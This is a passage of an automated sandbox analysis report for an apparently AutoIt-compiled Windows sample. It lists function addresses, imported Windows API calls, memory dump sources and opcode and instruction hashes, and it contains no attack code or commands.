                                                                  • Opcode Fuzzy Hash: 27990a550c1c333a2c7bb747815441d4447d74cc3678df37aa15ca8bee7d1911
                                                                  • Instruction Fuzzy Hash: 89E08672A023129BD7212FB1AC0CB477BACEF95791F028859F241DA080DB348401C760
                                                                  Function 0036B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 0036B496
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0036B4A0
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0036B4B5
                                                                  • GetStockObject.GDI32(00000005), ref: 0036B4BD
                                                                  • GetWindowDC.USER32(?,00000000), ref: 003CDE2B
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 003CDE38
                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 003CDE51
                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 003CDE6A
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 003CDE8A
                                                                  • ReleaseDC.USER32(?,00000000), ref: 003CDE95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 1946975507-0
                                                                  • Opcode ID: bd6af68ab5ed1e8c84da1451478bf5ba89ecd29a2719f388c5611b83d769c2c7
                                                                  • Instruction ID: bfdbbb50fc5392b98744b9e2c7770f303626cdb24fe8082d8c9fe43c8cb81673
                                                                  • Opcode Fuzzy Hash: bd6af68ab5ed1e8c84da1451478bf5ba89ecd29a2719f388c5611b83d769c2c7
                                                                  • Instruction Fuzzy Hash: 03E06D31100240AADB231B74FC0DBD83F15EB12335F00C26BF66A980E2C7714981CB11
                                                                  Function 003CB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: e858de8af507491bbdbf0488f4ec3601fdff842afbb6a71ada664e19017cfd00
                                                                  • Instruction ID: 9bf3483b792162314697f3710ddade36693f05c82bf530656596b118415bdd5f
                                                                  • Opcode Fuzzy Hash: e858de8af507491bbdbf0488f4ec3601fdff842afbb6a71ada664e19017cfd00
                                                                  • Instruction Fuzzy Hash: 87E046B1501204EFEB025F70EC48A2EBBACEB4C350F12C80AFC5A8B250CB78D8408B80
                                                                  Function 0038B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0038B2DF
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 0038B2EB
                                                                  • CloseHandle.KERNEL32(?), ref: 0038B2F4
                                                                  • CloseHandle.KERNEL32(?), ref: 0038B2FC
                                                                    • Part of subcall function 0038AB24: GetProcessHeap.KERNEL32(00000000,?,0038A848), ref: 0038AB2B
                                                                    • Part of subcall function 0038AB24: HeapFree.KERNEL32(00000000), ref: 0038AB32
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  • Opcode ID: 0d39b1adf6671bed4a1566282528e431daeffdeabb70f12ba9c161c3fe10c6d8
                                                                  • Instruction ID: 0dc8e19834e24db163bb7f4d1871c38b20059a09b56c0bd0a6f5b7fa391ca040
                                                                  • Opcode Fuzzy Hash: 0d39b1adf6671bed4a1566282528e431daeffdeabb70f12ba9c161c3fe10c6d8
                                                                  • Instruction Fuzzy Hash: 86E02F3A105505BBDB036FA5FC08859FB6AFF993217108622F625815B5CB329471EB91
                                                                  Function 003CB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: 9578a8219c5972bc49f523f3d0ecb72bfe9bd61453b2870585493741c9948652
                                                                  • Instruction ID: e773c27d94c99f44b7768d1b9eaba3ba248ba060edff1a05e83fd1fbaebf1d67
                                                                  • Opcode Fuzzy Hash: 9578a8219c5972bc49f523f3d0ecb72bfe9bd61453b2870585493741c9948652
                                                                  • Instruction Fuzzy Hash: 6DE046B1501200EFDB025F70EC4862D7BACEB4C350F12C80AF95A8B260CB78D9008B80
                                                                  Function 0038DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0038DEAA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ContainedObject
                                                                  • String ID: AutoIt3GUI$Container
                                                                  • API String ID: 3565006973-3941886329
                                                                  • Opcode ID: fc0865fbe34e845a7ddaf2b3cf4d5165fcf9e6daa33c70de518506f1ff07d586
                                                                  • Instruction ID: 636653e1a40842b3244bd8a8d2bb9a1ef96899814faa717773cdac53da772bd8
                                                                  • Opcode Fuzzy Hash: fc0865fbe34e845a7ddaf2b3cf4d5165fcf9e6daa33c70de518506f1ff07d586
                                                                  • Instruction Fuzzy Hash: 79913870600701AFDB15EF64C884B6AB7B9BF49714F2084AEF94ADF691DB70E941CB50
                                                                  Function 0039DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036C6F4: _wcscpy.LIBCMT ref: 0036C717
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                  • __wcsnicmp.LIBCMT ref: 0039DEFD
                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0039DFC6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                  • String ID: LPT
                                                                  • API String ID: 3222508074-1350329615
                                                                  • Opcode ID: 40e4834560ad3fdbc8a3e201f5722d0aaea1918c6ac6799249e2922631e986db
                                                                  • Instruction ID: 7caa42afda9011deff8e02deae8ab3aa424310e0f917697c9785deaa2c8632df
                                                                  • Opcode Fuzzy Hash: 40e4834560ad3fdbc8a3e201f5722d0aaea1918c6ac6799249e2922631e986db
                                                                  • Instruction Fuzzy Hash: 15618175A00215EFCF16DF98C896EAEB7B9BF08710F05405AF946AB391D770AE44CB90
                                                                  Function 0039290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy
                                                                  • String ID: I/<$I/<
                                                                  • API String ID: 3048848545-3015493500
                                                                  • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                  • Instruction ID: 5050928cbf8e110af3b9d872ab5bdd62f0295621f769ef3895164b4a285c2057
                                                                  • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                  • Instruction Fuzzy Hash: 4241F832900A16BACF27EF98D4419FEB7B4EF09710F51505AE881AB191DB305E96C760
                                                                  Function 0036BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 0036BCDA
                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0036BCF3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  • Opcode ID: 6cc08eb36ec5c00e1a7093fd9659ca5ba8560f9c9ed8f0d4e195ade28181daec
                                                                  • Instruction ID: 4c3b61867fc18f153cb4f51ec3de4cb76802a3b1be235563473ee66e07cc6356
                                                                  • Opcode Fuzzy Hash: 6cc08eb36ec5c00e1a7093fd9659ca5ba8560f9c9ed8f0d4e195ade28181daec
                                                                  • Instruction Fuzzy Hash: C0515771408B449BE321AF14DC8ABAFBBECFF94354F418C5EF1C8460A6DB7185A88756
                                                                  Function 0039C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003544ED: __fread_nolock.LIBCMT ref: 0035450B
                                                                  • _wcscmp.LIBCMT ref: 0039C65D
                                                                  • _wcscmp.LIBCMT ref: 0039C670
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$__fread_nolock
                                                                  • String ID: FILE
                                                                  • API String ID: 4029003684-3121273764
                                                                  • Opcode ID: b669efec4bf522c0d3ce6f166de7ac66b33d13884d5e3920fafe61bee59e0055
                                                                  • Instruction ID: 41125f636b4d62afc97d10e16951d6a8141487d08883ae5c9ad9f79771902674
                                                                  • Opcode Fuzzy Hash: b669efec4bf522c0d3ce6f166de7ac66b33d13884d5e3920fafe61bee59e0055
                                                                  • Instruction Fuzzy Hash: EF41F672A0020ABBDF229AA4DC41FEF77B9EF49714F000469FA05FB191D6749A08CB51
                                                                  Function 003BA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 003BA85A
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003BA86F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: '
                                                                  • API String ID: 3850602802-1997036262
                                                                  • Opcode ID: 5ca6a2ca622e2b0f580844f7148627198f61150409d019182c66a662f6bb854b
                                                                  • Instruction ID: 50529df07c9547f89ebd459ea37fc8a0779cca09e372aaeb929e2eb76e8aa543
                                                                  • Opcode Fuzzy Hash: 5ca6a2ca622e2b0f580844f7148627198f61150409d019182c66a662f6bb854b
                                                                  • Instruction Fuzzy Hash: 78413974E00B099FDB15CFA8C881BDA7BB9FB08304F10006AEA04EBB51D770A945CF91
                                                                  Function 003B975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 003B980E
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 003B984A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$DestroyMove
                                                                  • String ID: static
                                                                  • API String ID: 2139405536-2160076837
                                                                  • Opcode ID: 9822029e9bd3561ceedae8e1b57c44b98cc255bc7bef82d03a73ae7023eab7d1
                                                                  • Instruction ID: 36b23a04b4de858273c77ac8257b0d63302cafa3a27895b07ab00a6e7261f09f
                                                                  • Opcode Fuzzy Hash: 9822029e9bd3561ceedae8e1b57c44b98cc255bc7bef82d03a73ae7023eab7d1
                                                                  • Instruction Fuzzy Hash: 6A31AF71110604AEEB129F38CC81BFB77ADFF59764F01861AFAA9C7190CA31AC81C764
                                                                  Function 00395157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003951C6
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00395201
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: f0cfbc584c8842471ab7557802e7a2f5c98d71b154622a30dc3ca289b90d5c1c
                                                                  • Instruction ID: 689ebf4a901e3766f3c69754740f5edb7dba8d5711cb9839cf93263cede7d3e0
                                                                  • Opcode Fuzzy Hash: f0cfbc584c8842471ab7557802e7a2f5c98d71b154622a30dc3ca289b90d5c1c
                                                                  • Instruction Fuzzy Hash: 2B31B4316007059FEF27CF99D845BAEBBF8EF45350F154829E9C5A61A0E7709A85CB10
                                                                  Function 003A658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __snwprintf
                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                  • API String ID: 2391506597-2584243854
                                                                  • Opcode ID: b83c763a0ac7cb8247802d027ea32209125217c879d351c0e18841e3fcb5f16d
                                                                  • Instruction ID: 92ec1575af7b0d9028fb8a320000a0f8c1626ad500eaf17b23266feaa47d77e7
                                                                  • Opcode Fuzzy Hash: b83c763a0ac7cb8247802d027ea32209125217c879d351c0e18841e3fcb5f16d
                                                                  • Instruction Fuzzy Hash: 0421A531600218AFCF12EF64C882FAE77B4EF45701F140469F805AF1A1DB74EA49CBA5
                                                                  Function 003B93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003B945C
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003B9467
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Combobox
                                                                  • API String ID: 3850602802-2096851135
                                                                  • Opcode ID: 970aec810264a809bbb19b88f0a2f799a4aa88841fe78acb2cb3337b3bb82640
                                                                  • Instruction ID: 188a0c8a0f66367d799342a473a0c7f94c4aec047dad255e3170935c5b871d3f
                                                                  • Opcode Fuzzy Hash: 970aec810264a809bbb19b88f0a2f799a4aa88841fe78acb2cb3337b3bb82640
                                                                  • Instruction Fuzzy Hash: 351163713101086FEF12DF55DC80FEB376EEB883A8F114126FB199B6A0D6759C528760
                                                                  Function 003BDA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • GetActiveWindow.USER32 ref: 003BDA7B
                                                                  • EnumChildWindows.USER32(?,003BD75F,00000000), ref: 003BDAF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ActiveChildEnumLongWindows
                                                                  • String ID: T1:
                                                                  • API String ID: 3814560230-2493874558
                                                                  • Opcode ID: 20af6b37e1267f0c28d8e09292540b8233aabb31c8903053e4c5c3f4a1597f02
                                                                  • Instruction ID: fe7b2e6addad187da5daa1c31220ca37c115b2d8a6cae571998db5d29ae8abd9
                                                                  • Opcode Fuzzy Hash: 20af6b37e1267f0c28d8e09292540b8233aabb31c8903053e4c5c3f4a1597f02
                                                                  • Instruction Fuzzy Hash: 79214F39604201DFC716DF28E850AE5B7E9EF49320F254629FA66873E0D731A840CF64
                                                                  Function 003B98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0036D1BA
                                                                    • Part of subcall function 0036D17C: GetStockObject.GDI32(00000011), ref: 0036D1CE
                                                                    • Part of subcall function 0036D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0036D1D8
                                                                  • GetWindowRect.USER32(00000000,?), ref: 003B9968
                                                                  • GetSysColor.USER32(00000012), ref: 003B9982
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                  • String ID: static
                                                                  • API String ID: 1983116058-2160076837
                                                                  • Opcode ID: 42768f0003536d693e17e5301cbed81f95ee4e5028440efeecaabc36d96a5e59
                                                                  • Instruction ID: 545514044abe5d8f90170ac338780ebfc777dbdd3525ce4c5476354e92a8dcb9
                                                                  • Opcode Fuzzy Hash: 42768f0003536d693e17e5301cbed81f95ee4e5028440efeecaabc36d96a5e59
                                                                  • Instruction Fuzzy Hash: 9B113772620209AFDB05DFB8DC45EFA7BA8FB09348F014629FA55E3250E735E851DB60
                                                                  Function 003B9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                  Download Yara Rule
